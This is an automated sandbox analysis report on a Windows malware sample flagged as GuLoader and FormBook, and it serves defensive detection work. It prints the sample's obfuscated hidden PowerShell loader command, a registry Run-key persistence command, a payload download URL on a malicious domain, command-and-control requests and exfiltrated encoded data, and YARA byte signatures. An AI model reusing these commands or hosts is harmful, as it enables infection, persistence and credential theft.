Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe
Analysis ID:1431789
MD5:4621fea50e1982e6f753efe7d1be2b35
SHA1:46072b07bfa96583ed03149a04411cbcf04eadf9
SHA256:6b2874507fc8b7782d11f202840850ba6edd8befbb8c163c4d53775fb8d20603
Tags:exe
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Obfuscated command line found
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe (PID: 7592 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe" MD5: 4621FEA50E1982E6F753EFE7D1BE2B35)
    • powershell.exe (PID: 7656 cmdline: "powershell.exe" -windowstyle hidden "$Indeterminative=Get-Content 'C:\Users\user\AppData\Local\Temp\Moviedom230\Enforcedly251\Afvrgningernes.Ign37';$Introducerer=$Indeterminative.SubString(18884,3);.$Introducerer($Indeterminative)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7816 cmdline: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Overfondle.exe (PID: 7376 cmdline: "C:\Users\user\AppData\Local\Temp\Overfondle.exe" MD5: 4621FEA50E1982E6F753EFE7D1BE2B35)
        • cmd.exe (PID: 1352 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 2712 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • rmGjiHyfWQcajCGtrYkAoHJJOdK.exe (PID: 5796 cmdline: "C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • cmd.exe (PID: 6348 cmdline: "C:\Windows\SysWOW64\cmd.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • rmGjiHyfWQcajCGtrYkAoHJJOdK.exe (PID: 5852 cmdline: "C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • firefox.exe (PID: 2180 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.2615858541.0000000000BD0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000E.00000002.2615858541.0000000000BD0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a590:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13b3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000F.00000002.2616564781.0000000002D60000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000F.00000002.2616564781.0000000002D60000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x602c1:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x49870:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      0000000E.00000002.2616210214.0000000000D20000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 10 entries

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Suspicious Script Execution From Temp Folder
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "powershell.exe" -windowstyle hidden "$Indeterminative=Get-Content 'C:\Users\user\AppData\Local\Temp\Moviedom230\Enforcedly251\Afvrgningernes.Ign37';$Introducerer=$Indeterminative.SubString(18884,3);.$Introducerer($Indeterminative)", CommandLine: "powershell.exe" -windowstyle hidden "$Indeterminative=Get-Content 'C:\Users\user\AppData\Local\Temp\Moviedom230\Enforcedly251\Afvrgningernes.Ign37';$Introducerer=$Indeterminative.SubString(18884,3);.$Introducerer($Indeterminative)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe, ParentProcessId: 7592, ParentProcessName: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Indeterminative=Get-Content 'C:\Users\user\AppData\Local\Temp\Moviedom230\Enforcedly251\Afvrgningernes.Ign37';$Introducerer=$Indeterminative.SubString(18884,3);.$Introducerer($Indeterminative)", ProcessId: 7656, ProcessName: powershell.exe
        Sigma detected: CurrentVersion Autorun Keys Modification
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 2712, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Hakkebrttet
        Sigma detected: Direct Autorun Keys Modification
        Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1352, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)", ProcessId: 2712, ProcessName: reg.exe
        Sigma detected: Potential Dosfuscation Activity
        Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", CommandLine: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "powershell.exe" -windowstyle hidden "$Indeterminative=Get-Content 'C:\Users\user\AppData\Local\Temp\Moviedom230\Enforcedly251\Afvrgningernes.Ign37';$Introducerer=$Indeterminative.SubString(18884,3);.$Introducerer($Indeterminative)", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7656, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", ProcessId: 7816, ProcessName: cmd.exe
        Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Overfondle.exe", ParentImage: C:\Users\user\AppData\Local\Temp\Overfondle.exe, ParentProcessId: 7376, ParentProcessName: Overfondle.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)", ProcessId: 1352, ProcessName: cmd.exe
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Indeterminative=Get-Content 'C:\Users\user\AppData\Local\Temp\Moviedom230\Enforcedly251\Afvrgningernes.Ign37';$Introducerer=$Indeterminative.SubString(18884,3);.$Introducerer($Indeterminative)", CommandLine: "powershell.exe" -windowstyle hidden "$Indeterminative=Get-Content 'C:\Users\user\AppData\Local\Temp\Moviedom230\Enforcedly251\Afvrgningernes.Ign37';$Introducerer=$Indeterminative.SubString(18884,3);.$Introducerer($Indeterminative)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe, ParentProcessId: 7592, ParentProcessName: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Indeterminative=Get-Content 'C:\Users\user\AppData\Local\Temp\Moviedom230\Enforcedly251\Afvrgningernes.Ign37';$Introducerer=$Indeterminative.SubString(18884,3);.$Introducerer($Indeterminative)", ProcessId: 7656, ProcessName: powershell.exe

        Snort Signatures

        No Snort rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus detection for URL or domain
        Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
        Source: https://kraljevikonaci.rs/Avira URL Cloud: Label: malware
        Source: https://kraljevikonaci.rs/ETfFmOW246.binAvira URL Cloud: Label: malware
        Source: https://kraljevikonaci.rs/ETfFmOW246.bin5?Avira URL Cloud: Label: malware
        Source: https://kraljevikonaci.rs/ETfFmOW246.binYAvira URL Cloud: Label: malware
        Source: https://kraljevikonaci.rs/ETfFmOW246.binsAvira URL Cloud: Label: malware
        Multi AV Scanner detection for domain / URL
        Source: kraljevikonaci.rsVirustotal: Detection: 15%Perma Link
        Source: https://kraljevikonaci.rs/ETfFmOW246.binVirustotal: Detection: 15%Perma Link
        Multi AV Scanner detection for dropped file
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeReversingLabs: Detection: 50%
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeVirustotal: Detection: 60%Perma Link
        Multi AV Scanner detection for submitted file
        Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeReversingLabs: Detection: 50%
        Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeVirustotal: Detection: 57%Perma Link
        Yara detected FormBook
        Source: Yara matchFile source: 0000000E.00000002.2615858541.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.2616564781.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.2616210214.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2164570528.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.2614202921.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.2184865476.0000000021B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.2615828558.0000000003550000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Machine Learning detection for dropped file
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeJoe Sandbox ML: detected
        Machine Learning detection for sample
        Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeJoe Sandbox ML: detected
        Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 195.252.110.253:443 -> 192.168.2.10:49706 version: TLS 1.2
        Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2075195434.0000000008A34000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: Overfondle.exe, 00000008.00000001.1889349329.0000000000649000.00000020.00000001.01000000.0000000A.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000002.00000002.2069285687.0000000007840000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000002.2615448213.0000000000D1E000.00000002.00000001.01000000.0000000C.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000F.00000000.2233571308.0000000000D1E000.00000002.00000001.01000000.0000000C.sdmp
        Source: Binary string: wntdll.pdbUGP source: Overfondle.exe, 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2067651043.000000002027C000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2065314777.00000000200C7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.2169674706.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2616648918.0000000003130000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2616648918.00000000032CE000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.2164405246.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: cmd.pdbUGP source: Overfondle.exe, 00000008.00000003.2127890263.00000000200C1000.00000004.00000020.00020000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000003.2098058163.000000000047B000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: Overfondle.exe, Overfondle.exe, 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2067651043.000000002027C000.00000004.00000020.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp, Overfondle.exe, 00000008.00000003.2065314777.00000000200C7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, cmd.exe, 0000000E.00000003.2169674706.0000000002F88000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2616648918.0000000003130000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2616648918.00000000032CE000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.2164405246.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: Overfondle.exe, 00000008.00000001.1889349329.0000000000649000.00000020.00000001.01000000.0000000A.sdmp
        Source: Binary string: cmd.pdb source: Overfondle.exe, 00000008.00000003.2127890263.00000000200C1000.00000004.00000020.00020000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000003.2098058163.000000000047B000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeCode function: 0_2_00405A19 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405A19
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeCode function: 0_2_004065CE FindFirstFileA,FindClose,0_2_004065CE
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeCode function: 0_2_004027AA FindFirstFileA,0_2_004027AA
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_003DB880 FindFirstFileW,FindNextFileW,FindClose,14_2_003DB880
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Moviedom230\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Moviedom230\Grnnende\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 4x nop then xor eax, eax14_2_003C9430
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 4x nop then pop edi14_2_003D1DAF
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 4x nop then pop edi14_2_003D1DD0
        Source: Joe Sandbox ViewIP Address: 219.94.128.41 219.94.128.41
        Source: Joe Sandbox ViewIP Address: 217.160.0.183 217.160.0.183
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /ETfFmOW246.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: kraljevikonaci.rsCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /9pdo/?U06lIV=DnYaRovP48GzkkJ0SsWJ4MnlEFB7/DbwuVP/6iFiedv+ORSC+0oTk/Kl1D7Kx2hOtjeczUyzMCTs4BuiBiMV1f4J24UrdDssz4r6IbwvRD0aCWqy3Q==&VbTh4=rjJH3N1 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.ejbodyart.comUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
        Source: global trafficHTTP traffic detected: GET /9pdo/?U06lIV=9/X38tn9qLO2xSFr83Mmx4ws3CHxUFQCRmtcXfkuabXCkgKRDBhcw5zs5NSemU/1fww/nV1egvBpaCqwFnieo+CDMv1CzJiFlGe2VwbVhWcu3PKwdg==&VbTh4=rjJH3N1 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.jt-berger.storeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
        Source: global trafficDNS traffic detected: DNS query: kraljevikonaci.rs
        Source: global trafficDNS traffic detected: DNS query: www.ejbodyart.com
        Source: global trafficDNS traffic detected: DNS query: www.jt-berger.store
        Source: global trafficDNS traffic detected: DNS query: www.n-benriya002.com
        Source: unknownHTTP traffic detected: POST /9pdo/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-usContent-Type: application/x-www-form-urlencodedContent-Length: 195Connection: closeCache-Control: no-cacheHost: www.jt-berger.storeOrigin: http://www.jt-berger.storeReferer: http://www.jt-berger.store/9pdo/User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4Data Raw: 55 30 36 6c 49 56 3d 77 39 2f 58 2f 5a 4c 35 36 72 61 5a 34 68 56 33 39 45 78 32 2f 70 45 76 31 45 53 4e 62 53 74 57 57 55 56 72 52 66 38 4f 48 36 44 43 68 41 76 2f 4c 6b 41 68 6c 62 58 49 33 4a 79 6b 6f 57 53 44 63 58 6b 31 37 46 4a 76 6a 66 42 6b 54 78 44 68 4e 6d 36 6d 2b 37 4b 69 44 39 70 47 77 35 75 31 6b 6c 36 34 66 77 6d 71 74 57 34 71 7a 39 32 53 42 6b 76 63 76 6d 78 6a 41 59 6f 61 43 63 4e 56 38 56 57 38 34 79 58 77 37 76 37 58 74 5a 58 57 68 30 66 47 52 73 6c 73 72 45 45 73 72 46 33 69 30 4b 77 4c 4c 2f 42 51 72 72 34 4a 69 7a 5a 76 5a 7a 38 49 42 65 41 76 2b 6a 6a 77 Data Ascii: U06lIV=w9/X/ZL56raZ4hV39Ex2/pEv1ESNbStWWUVrRf8OH6DChAv/LkAhlbXI3JykoWSDcXk17FJvjfBkTxDhNm6m+7KiD9pGw5u1kl64fwmqtW4qz92SBkvcvmxjAYoaCcNV8VW84yXw7v7XtZXWh0fGRslsrEEsrF3i0KwLL/BQrr4JizZvZz8IBeAv+jjw
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Apr 2024 17:25:49 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 70 64 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a 0d 0a Data Ascii: c7<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /9pdo/ was not found on this server.<P></BODY></HTML>
